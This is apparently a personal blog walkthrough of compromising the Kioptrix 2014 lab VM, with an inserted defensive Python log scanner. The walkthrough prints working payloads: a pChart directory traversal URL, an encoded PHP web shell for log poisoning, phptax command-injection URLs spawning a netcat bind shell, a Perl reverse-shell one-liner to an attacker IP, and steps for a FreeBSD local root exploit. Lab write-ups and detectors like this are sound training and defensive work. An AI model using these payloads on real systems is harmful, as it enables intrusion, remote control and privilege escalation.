Today was one of those days where I was supposed to start doing some school work. I am just not “feeling” natural sciences, and the grass is too wet to mow. That said, I figured it would be a good time to try out the new Kioptrix. Kioptrix is a boot2root that targets beginning hackers. I picked up my copy from VulnHub, http://vulnhub.com/ (great, active community on freenode).
I imported it into Parallels, and everything was pretty straightforward; if you use VirtualBox or Workstation 9 or below, you will need to follow the additional instructions.
Using netdiscover, it’s pretty clear which IP address is Kioptrix.
I go ahead and run nmap on that IP address, which reveals two open ports, 80 and 8080. Based on the response, it looks like port 8080 is not allowing nmap to access it.
Let’s go ahead and do some directory discovery on port 80.
Looks like there isn’t much there…
Oh, look at that! I should have looked at the source first; should have known….
Let’s go to that address. Interesting, we see that there is in fact a web application on this server, pChart 2.1.3, and it gives us the version.
Let’s ask Google….
And in fact Google tells us that there is an exploit!
It looks as though there is a directory traversal bug, so let’s try it out….
[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”
The traversal is executed with the web server’s privilege and leads to sensitive file disclosure (passwd, siteconf.inc.php or similar), access to source codes, hardcoded passwords or other high impact consequences, depending on the web server’s configuration. This problem may exist in the production code if the example code was copied into the production environment.
And we append index.php?Action=View&Script=%2f..%2f..%2fetc/passwd
Looks like our LFI is working! Now what? Well… based on my experience with LFI in my OSCP and OSCE classes, traditionally we can get code execution from PHP code and log poisoning. Let’s see what we can browse to. After googling “freebsd apache log” and trying one of the locations, I get a success with the error log:
If you look closely, it also shows us 404s, so let’s try inserting a PHP script, URL encoded as:
%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%20%3F%3E%0A%0A
Our code shows up in the log, highlighted in blue. It does not execute, however.
Let’s try the 8080 site:
We keep getting:
[Sun Jun 01 13:54:44 2014] [error] [client 192.168.1.228] client denied by server configuration: /usr/local/www/apache22/data2/
[Sun Jun 01 13:54:44 2014] [error] [client 192.168.1.228] client denied by server configuration: /usr/local/www/apache22/data2/favicon.ico
[Sun Jun 01 13:54:44 2014] [error] [client 192.168.1.228] client denied by server configuration: /usr/local/www/apache22/data2/favicon.ico
Using the Firefox add-on User Agent Switcher, I quickly changed to Mozilla 4 and refreshed the page:
The first thing Exploit-DB tells us is:
The application is prone to a remote code execution vulnerability.
—————————————————-
drawimage.php, line 63:
include("./files/$_GET[pfilez]");
// makes a png image
$pfilef=str_replace(".tob",".png",$_GET[pfilez]);
$pfilep=str_replace(".tob",".pdf",$_GET[pfilez]);
Header("Content-type: image/png");
if ($_GET[pdf] == "") Imagepng($image);
if ($_GET[pdf] == "make") Imagepng($image,"./data/pdf/$pfilef");
if ($_GET[pdf] == "make") exec("convert ./data/pdf/$pfilef ./data/pdf/$pfilep");
—————————————————-
Exploit / Proof of Concept:
Bindshell on port 23235 using netcat:
http://localhost/phptax/drawimage.php?pfilez=xxx;%20nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
Exploit-DB Verified:
http://localhost/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make
Interesting, I tried the PoC and it seems I get no bind shell at all. I’ve experienced this before; there are many flavors of netcat, and sometimes the bind option just doesn’t work.
Same idea as before, let’s abuse the PHP.
echo '' > cmd.php
http://192.168.1.234:8080/phptax/cmd.php?cmd=ls
It looks as though it’s working now….
Let’s get something a little more substantial.
Using perl -v and python -v, I found Perl was installed. I used this Perl one-liner:
perl -e 'use Socket;$i="192.168.1.228";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
By itself it doesn’t work, but URL encoded, it works just fine…
Okay… so now we’ve got a shell.
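As an added, defender-side example that is not part of the original writeup, the following Python scans Apache combined-format access-log lines for the three request patterns this walkthrough relies on: the encoded pChart traversal, the PHP tag smuggled into a 404 path or User-Agent for log poisoning, and shell metacharacters in the phptax pfilez parameter that drawimage.php hands to exec(). The log lines are constructed; only the parameter name and the request shapes come from the page.

```python
import re
from urllib.parse import unquote

# Apache "combined" access-log format (one named group per field we use).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
# Query parameters that phptax's drawimage.php passes straight to exec().
SHELL_PARAMS = {"pfilez"}
SHELL_META = re.compile(r'[;|`]|\$\(')
PHP_TAG = re.compile(r'<\?(php|=)', re.IGNORECASE)

# Constructed sample lines modelled on the requests in the walkthrough.
SAMPLE_ACCESS_LOG = [
    '192.168.1.228 - - [01/Jun/2014:13:54:44 -0400] "GET /pChart2.1.3/examples/index.php HTTP/1.1" 200 4120 "-" "Mozilla/5.0"',
    '192.168.1.228 - - [01/Jun/2014:13:55:10 -0400] "GET /pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd HTTP/1.1" 200 1893 "-" "Mozilla/5.0"',
    '192.168.1.228 - - [01/Jun/2014:13:56:02 -0400] "GET /%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%20%3F%3E HTTP/1.1" 404 209 "-" "Mozilla/5.0"',
    '192.168.1.228 - - [01/Jun/2014:14:02:31 -0400] "GET /phptax/drawimage.php?pfilez=1040d1-pg2.tob;id;&pdf=make HTTP/1.1" 200 0 "-" "Mozilla/4.0"',
]


def decode(s: str) -> str:
    """URL-decode until stable so double-encoded traversals (%252f) are caught too."""
    while (d := unquote(s)) != s:
        s = d
    return s


def analyze(line: str) -> list:
    """Return the findings for one access-log line (empty list if benign)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    url, ua = decode(m["url"]), decode(m["ua"])
    findings = []
    if "../" in url:
        findings.append("directory traversal in request URL")
    if PHP_TAG.search(url) or PHP_TAG.search(ua):
        findings.append("PHP tag in request or User-Agent (log poisoning attempt)")
    # Split the raw query first so an encoded '&' inside a value cannot hide a parameter.
    for pair in m["url"].partition("?")[2].split("&"):
        name, _, value = pair.partition("=")
        if decode(name) in SHELL_PARAMS and SHELL_META.search(decode(value)):
            findings.append("shell metacharacters in parameter " + decode(name))
    return findings


def scan(lines) -> dict:
    """Map 1-based line numbers to findings, for lines that raised at least one."""
    return {i: f for i, l in enumerate(lines, 1) if (f := analyze(l))}
```

Pointing scan() at the real access log (and the matching error log, where Apache writes the decoded path) surfaces each step of this box in order.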
Now let’s get root.
$ uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 [email protected]:/usr/obj/usr/src/sys/GENERIC amd64
Let’s again look at Exploit-DB and see if there is anything we can use.
Looks like there is one for FreeBSD 9.0, so let’s try it out.
http://www.exploit-db.com/exploits/28718/
GCC is installed, so we won’t need a staging OS or any other toolchain to compile. Let’s upload this, compile it, and see how it works.
$ gcc freebsd9.c -o freebsd
$ ls
aprB03fuz
aprXKVLzT
freebsd
freebsd9.c
mysql.sock
vmware-fonts0
$ chmod 777 freebsd
$ ./freebsd
[+] SYSRET FUCKUP!!
[+] Start Engine…
[+] Crotz…
[+] Crotz…
[+] Crotz…
[+] Woohoo!!!
$ whoami
root
Sweet! All in all, it was a good day of procrastination!